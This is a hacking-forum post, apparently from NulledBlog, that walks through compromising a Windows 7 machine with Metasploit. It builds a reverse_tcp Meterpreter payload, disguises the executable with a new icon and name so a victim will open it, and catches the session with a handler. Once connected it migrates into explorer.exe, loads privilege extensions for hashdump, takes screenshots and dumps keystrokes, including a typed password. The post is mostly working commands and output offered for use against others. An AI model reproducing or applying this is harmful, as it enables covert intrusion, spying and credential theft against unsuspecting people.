Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

[Tutorial] How to Hack windows with metasploit even windows 7 [Advanced]

hack windows 7 Advanced metasploit

  • Please log in to reply
No replies to this topic

#1
TimeCenter

  • Offline
  • Hack The Time :D

  • Posts:
    79
    Reputation:
    5
    Joined:
    08 Jul, 2016
Backtrack 4 is used in this situation, but you can also use windows if you wan't to. What we are going to use is: Metasploit and Nmap. Just follow the step.
Download Metasploit on this site http://www.metasploit.com/download/ you can use it on windows or linux.
Install the program.

If it is only local network use your local IP address, if is it over internet, use your WAN IP address, you can see it from http://www.whatismyip.com/

start terminal/shell on backtrack.


root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=10.113.201.34,LPORT=4444
root@bt:~#
If you made the payload right, it will come like this, if dosent show like this, you did it wrong. The payload.exe file will be on your desktop.
I suggest if you can download Icon Changer 3.8 and change the Icon and named something more interesting, then can you easily make somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs...er_download.htm

start metasploit, and choose your exploit and PAYLOAD. Do it like above.

root@bt:~# msfconsole

 __
< metasploit >
 --
  \   ,__,
  \  (oo)____
  (__)    )\
    ||--|| *

  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
  =[ svn r9959 updated 241 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 241 days ago.
  We recommend that you update the framework at least every other day.
  For information on updating your copy of Metasploit, please see:
  http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >  
See wich options you have.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  --  --  --

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, process
   LHOST    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
We are going to use our Local IP address on this time. do that by open new terminal/shell.

root@bt:~# ifconfig
eth0  Link encap:Ethernet  HWaddr 00:0c:29:32:56:46
    inet addr:10.113.201.34  Bcast:10.113.201.255  Mask:255.255.255.0
    inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
    RX packets:43 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:5370 (5.3 KB)  TX bytes:1152 (1.1 KB)
    Interrupt:19 Base address:0x2000
Lets start to insert our IP and port. Let's get back to metasploit.

msf exploit(handler) > set LHOST 10.113.201.34
LHOST => 10.113.201.34
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
Make someone to open the payload.exe I recommend to download Icon Changer 3.8 and change the payload.exe icon an rename it, and then you can send it to somebody. After they open the file will it be like this.

[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 10.113.201.59
[*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200

meterpreter > 
We are going to migrate with explorer.exe now. type ps to see targets services.
meterpreter > ps

Process list
==

 PID   Name    Arch  Session  User  Path
 ---   ----    ----  --  ----  ----
 0  [System Process]
 4  System
 356   smss.exe
 444   csrss.exe
 508   wininit.exe
 520   csrss.exe
 556   services.exe
 572   lsass.exe
 580   lsm.exe
 704   svchost.exe
 768   nvvsvc.exe
 808   svchost.exe
 868   svchost.exe
 900   svchost.exe
 928   svchost.exe
 1068  svchost.exe
 1144  DisplayLinkManager.exe
 1176  winlogon.exe
 1316  Smc.exe
 1400  nvvsvc.exe
 1476  svchost.exe
 1548  ccSvcHst.exe
 1708  spoolsv.exe
 1720  DisplayLinkUserAgent.exe
 1752  svchost.exe
 1992  svchost.exe
 2040  IPROSetMonitor.exe
 464   LVPrcSrv.exe
 408   mdm.exe
 940   svchost.exe
 1140  Rtvscan.exe
 1448  TeamViewer_Service.exe
 2068  UltiDevCassinWebServer2a.exe
 2144  vmware-usbarbitrator.exe
 2268  vmnat.exe
 2324  vmnetdhcp.exe
 2360  vmware-authd.exe
 2848  svchost.exe
 2916  svchost.exe
 3460  taskhost.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\system32\taskhost.exe
 3528  dwm.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\Dwm.exe
[b] 3580  explorer.exe    x86   1  SERMERSOOQ\ilin  C:\Windows\Explorer.EXE[/b]
 3740  DisplayLinkUI.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\DisplayLink Core Software\DisplayLinkUI.exe
 4080  hqtray.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\hqtray.exe
 2304  SmcGui.exe    x86   1
 2084  AdobeARM.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
 2336  ccApp.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Symantec Shared\ccApp.exe
 2000  LWS.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
 3832  PWRISOVM.EXE    x86   1  SERMERSOOQ\ilin  C:\Program Files\PowerISO\PWRISOVM.EXE
 4004  PrintScreen.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
 1952  PRTG Windows GUI.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\PRTG Network Monitor\PRTG Windows GUI.exe
 1936  CUCore.exe    x86   1  SERMERSOOQ\ilin  C:\Users\ilin\AppData\Local\Radvision\Conference Client\7.10.1.169\cucore.exe
 2540  COCIManager.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
 4784  SearchIndexer.exe
 2964  msnmsgr.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Messenger\msnmsgr.exe
 6028  wlcomm.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Windows Live\Contacts\wlcomm.exe
 5944  vmplayer.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\VMware\VMware Player\vmplayer.exe
 5096  firefox.exe  x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\firefox.exe
 448   plugin-container.exe    x86   1  SERMERSOOQ\ilin  C:\Program Files\Mozilla Firefox\plugin-container.exe
 4488  vmware-vmx.exe
 5200  Payload.exe  x86   1  SERMERSOOQ\ilin  C:\Users\ilin\Desktop\Payload.exe
 5696  notepad.exe  x86   1  SERMERSOOQ\ilin  C:\Windows\system32\notepad.exe

meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >  
I typed use priv to open hashdump or other things.
meterpreter > use priv
Loading extension priv...success.
type sysinfo to see wich system it is. Is it helpful?
meterpreter > sysinfo
Computer: NUUMOB0088
OS  : Windows 7 (Build 7600, ).
Arch    : x86
Language: da_DK
meterpreter >  
Take screenshot of targets desktop, remember after you make screenshot, the file is on your desktop.
meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache

meterpreter >   
You kan scan/listen targets what ever det type, by this.
meterpreter > keyscan_dump
Dumping captured keystrokes...
 <LWin> rnotepad <Return> my password it Hahahahaha <Alt>  <LMenu>  <Tab>
meterpreter > 
don't wan't to wait for the host, you can just type the targets ip and port. My tutorials link is here https://www.nulledbl...ith-metasploit/
  • 0



Also tagged with one or more of these keywords: hack, windows 7, Advanced, metasploit

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users